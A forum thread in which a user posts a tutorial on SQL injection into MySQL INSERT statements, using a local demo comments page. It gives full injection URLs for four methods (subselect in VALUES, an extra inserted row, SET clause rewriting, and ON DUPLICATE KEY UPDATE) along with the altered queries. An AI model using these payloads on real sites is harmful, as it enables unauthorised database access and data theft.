Results 1 to 3 of 3

Thread: INSERT Statement Sql Injection - Advanced - Tutorial Share/Save - My123World.Com!

  1. #1

    INSERT Statement Sql Injection - Advanced - Tutorial

    Hello everyone,

    My friend, Cyde, and I have been looking at a public source it's been few days and we found a lot of vulnerabilities related to Sql Injection where most of the statements where INSERT Statements and not the usual SELECT. Now I know that most people think that these kinds of injections are difficult and hard to deal with and that's why in this Tutorial I'll be explaining how to Inject various INSERT Statements which will be holding few tips and tricks.

    Our Goal
    Before we keep talking about this, I think you must know that the goal of these injections here are based on injecting a SELECT Statement within the INSERT Statement which will then force the Database to Insert the results of our SELECT statement and, as you'll see later, these inserted values will show up on a webpage which means that whatever we were after will be there for us to look at Lol.
    All of this tutorial is obviously easier if you know the original INSERT Statement because it's required for proper manipulating.

    The information
    1. Database/Table


    What matters the most in this Table is that the column 'id' is Unique and Auto Increments which means that each comment has its own ID and no other comment can have the same one, also, you don't have to provide an id value when inserting data in this table because the id column will be automatically filled; the first comment will have id=1, the second comment will have id=2, etc, but keep in mind that you can give an id to a comment if you want to. Everything I just mentioned is really important and you'll see why soon.
    1. Insert Script: 127.0.0.1/insert.php

    It supports two get variables only, 'videoid' and 'comment'. The username is automatically set to 'dotcppfile' and the 'id', just like we said before, gets an automatic value. So all we need is something like this request: 127.0.0.1/insert.php?videoid=123456&comment=interesting to insert a proper comment.
    1. The comments that we insert shows up at: 127.0.0.1/comments.php


    1. Our Insert page's source: pastebin.com/58w0h2Nw

    Various Interesting Types of INSERT Statements
    1. Type 1: INSERT INTO comments ('comment' ,'username', 'videoid') VALUES ('interesting', 'dotcppfile', '123456')
    2. Type 2: INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', 'videoid' = '123456'

    There's INSERT SELECT, INSERT DELAYED and many others but these can be injected in the same way so it's not that interesting. Anyways, we will be exploiting both of these types in 2 ways based on which variable is vulnerable.

    Type 1 - First
    So, we have the following insert statement:
    INSERT INTO comments ('comment' ,'username', 'videoid') VALUES ('interesting', 'dotcppfile', '123456').
    In this case, the get variable 'comment' in 'insert.php' is vulnerable. If we want to inject a proper select statement into this we should go for:
    127.0.0.1/insert.php?videoid=123456&comment=interesting ', (select version()), '123456')--+
    Our Original INSERT Statement will become:
    INSERT INTO comments ('comment' ,'username', 'videoid') VALUES ('interesting', (select version()), '123456')--+', 'dotcppfile', '123456')
    Now everything after --+ will be commented and what gets inserted in the database is what we asked for which is a comment that holds "interesting" and is posted by 'select version()' and that will be the output on 'comments.php':

    As you can see, the username is the value of our inserted SELECT statement, as simple as that.

    Now this part here is something you've seen out there, but what comes next should be original so keep reading.

    Type 1 - Second
    We have the same INSERT Statement:
    INSERT INTO comments ('comment' ,'username', 'videoid') VALUES ('interesting', 'dotcppfile', '123456')
    But this time, the get variable 'videoid' is vulnerable in 'insert.php'.
    Now, in this case, we have a huge difference, what I'm trying to say is what we used in the last part won't work, because we cannot edit the username or the comment or the videoid since they come before our injection. But, fortunately, in an INSERT Statement, you can insert multiple rows at a time using something like this:
    INSERT into comments ('comment', 'username', 'videoid') VALUES ('first comment', 'dotcppfile', '123456'), ('second comment', 'dotcppfile', '123456')
    We are going to use this right now to get things working, so here's how our link will look like:
    127.0.0.1/insert.php?comment=interesting&videoid=123456 '), ('second comment', (select version()), '123456')--+
    Our INSERT Statement will become:
    INSERT into comments ('comment', 'username', 'videoid') VALUES ('first comment', 'dotcppfile', '123456'), ('second comment', (select version()), '123456')--+')
    And the output on 'comments.php' will be:

    So two comments were inserted and the second one was holding the result of our SELECT Statement.

    As you can see, we can always do something no matter what, now lets move to Type 2.

    Type 2 - First
    Our INSERT Statement is the following: INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', 'videoid' = '123456'
    In 'insert.php' the get variable 'comment' is vulnerable, so to inject this properly we will be in need of the following URL:
    127.0.0.1/insert.php?videoid=123456&comment=interesting ', username=(select version()), videoid='123456'--+
    The INSERT Statement will become:
    INSERT INTO comments SET comment = 'interesting', username=(select version()), videoid='123456'--+', username = 'dotcppfile', 'videoid' = '123456'

    And that's pretty much it.

    Type 2 - Second
    Now this is what matters the most in this Tutorial.
    In this part we will be using an INSERT Statement with an UPDATE Statement to get things up and running properly.
    So again, our INSERT Statement is:
    INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', 'videoid' = '123456'
    But this time, in 'insert.php', the vulnerable get variable is 'videoid' and it won't be easy if we want to Sql Iinject and that is because 'videoid' is at the end of our INSERT Statement and we can't do just like we did in 'Type 1 - Second' in this type because it doesn't work that way, but again, there's always a way:
    If you remember, first, I mentioned that the table holds a column called 'id' that is Unique and Auto Increments, so every comment has its own id which is something we can use in our favor here. Now what we know is that the INSERT Statement doesn't fill the 'id' column, since it gets filled automatically, but we can fill it up and you'll see we want to soon, so, lets create a normal comment and give it our own id.
    Warning: We have to make sure that the 'id' we're giving is unique or else we will get a 'mysql error'.

    Lets go for the following URL:
    127.0.0.1/insert.php?comment=interesting&videoid=123456 ', id=2147483640--+
    The INSERT Statement will become:
    INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', 'videoid' = '123456', id=2147483640--+'
    And if we check the 'comments.php' page:

    Normal right? Obviously, but if we take a look at Data in the Table:

    As you can see, our own 'id' was inserted, but, what's the point?
    What we are trying to do here it to use the INSERT ... ON DUPLICATE KEY UPDATE statement: dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html
    What this statement will do is update the data in the Table with new data that was appended with the new insert statement IF the new data has the same ID as the main one. Read this again, it's what this whole part is about.
    Example:
    If we have the following Data in the Table:
    2147483640 | 123456 | dotcppfile | interesting
    And we try to insert the following using the INSERT ... ON DUPLICATE KEY UPDATE statement with 'comment':
    2147483640 | 123456 | dotcppfile | second comment
    It won't be inserted, but the main data will be updated and it will become:
    2147483640 | 123456 | dotcppfile | second comment

    Now we are going to use this, and our URL will be:
    127.0.0.1/insert.php?comment=interesting&videoid=123456 ', id=2147483640 ON DUPLICATE KEY UPDATE comment=(select version())--+
    And our INSERT Statement will be:
    INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', 'videoid' = '123456', id=2147483640 ON DUPLICATE KEY UPDATE comment=(select version())--+
    And the new output on our 'comments.php' will be:

    So we updated the old comment with the new comment.

    As simple as that.

    Now as you can see, INSERT Statements can be manipulated, we just have to be smart about it and do it right, we handled them in 4 ways in this tutorial and as far as I know this is mostly everything out there.

    I hope you learned something new,
    that's all for today,
    dotcppfile.
    XMPP:
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

    Blog:
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  2. #2
    thanks for sharing your article with insert sql statements :-)

  3. #3
    Quote Originally Posted by nullbyte View Post
    thanks for sharing your article with insert sql statements :-)
    Great you liked it, thanks for posting.
    XMPP:
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

    Blog:
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •